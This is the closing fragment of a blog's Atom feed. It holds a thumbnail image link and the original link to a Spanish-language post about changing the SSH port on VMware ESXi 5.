url="http://4.bp.blogspot.com/-e9vZnY1_oOg/TqtpgR_dIbI/AAAAAAAAAXg/bVJb2YPH3R0/s72-c/ESXi.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/10/cambiar-port-ssh-en-esxi-5.html</feedburner:origLink></entry></feed>

